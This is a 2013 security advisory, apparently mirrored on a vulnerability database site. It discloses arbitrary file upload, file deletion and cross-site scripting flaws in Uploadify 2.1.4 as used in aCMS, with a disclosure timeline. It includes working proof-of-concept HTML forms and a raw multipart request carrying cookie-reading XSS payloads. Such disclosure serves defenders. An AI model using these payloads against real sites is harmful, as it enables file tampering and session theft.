Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29820
HistoryOct 01, 2013 - 12:00 a.m.

AFU, AFD and XSS vulnerabilities in Uploadify

2013-10-0100:00:00
vulners.com
21
JSON

Hello 3APA3A!

These are Arbitrary File Uploading, Arbitrary File Deletion and Cross-Site Scripting vulnerabilities in Uploadify. Particularly in the version used in aCMS (it looks like these developers use modified version of Uploadify, but other developers also can use such version).

Affected products:

Vulnerable are Uploadify v2.1.4 and potentially other versions. Particularly version in aCMS. Versions Uploadify 3.x are not vulnerable.

Details:

Arbitrary File Uploading (WASC-31):

http://websecurity.com.ua/uploads/2013/Uploadify%20AFU.html

<body>
<form action="http://site/uploadify.php&quot; method="post" enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="folder" value="/uploadify/">
<input type="submit" value="OK">
</form>
</body>

Arbitrary File Deletion (WASC-42):

http://websecurity.com.ua/uploads/2013/Uploadify&#37;20AFD.html

<body>
<form action="http://site/uploadify.php&quot; method="post" enctype="multipart/form-data">
<input type="file" name="test">
<input type="hidden" name="newfile" value="/full/path/uploadify/1">
<input type="submit" value="OK">
</form>
</body>

Cross-Site Scripting (WASC-08):

http://websecurity.com.ua/uploads/2013/Uploadify&#37;20XSS.html

<body>
<form action="http://site/uploadify.php&quot; method="post" enctype="multipart/form-data">
<input type="file" name="test">
<input type="hidden" name="newfile" value="<body onload=alert(document.cookie)>">
<input type="submit" value="OK">
</form>
</body>

http://websecurity.com.ua/uploads/2013/Uploadify&#37;20XSS-2.html

<body>
<form action="http://site/uploadify.php&quot; method="post" enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="folder" value="/uploadify">
<input type="submit" value="OK">
</form>
</body>

The second attack can be done on Linux/Unix systems, where angle brackets can be used, or with spoofing headers.

With the next headers (to specify XSS payload in extension):

POST http://site/uploadify.php

-----------------------------240841995418756\r\n
Content-Disposition: form-data; name="Filedata"; filename="test.<body onload=with(document)alert(cookie)>"\r\n
Content-Type: application/octet-stream\r\n
\r\n
test\r\n
\r\n
-----------------------------240841995418756\r\n
Content-Disposition: form-data; name="folder"\r\n
\r\n
/uploadify\r\n
-----------------------------240841995418756–\r\n

Timeline:

2013.03.04 - informed developers of aCMS about part of the vulnerabilities.
2013.04.03 - informed developers of aCMS about another part of the vulnerabilities.
2013.04.07 - informed developers of aCMS about another part of the vulnerabilities.
2013.05.25 - informed developers of aCMS about another part of the vulnerabilities.
2013.05.26 - informed developers of aCMS about another part of the vulnerabilities.
In all cases the developers just ignored all messages via different e-mails and contact form.
2013.06.12 - announced at my site.
2013.06.22 - informed developers of Uploadify.
2013.09.12 - disclosed at my site (http://websecurity.com.ua/6566/&#41;.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON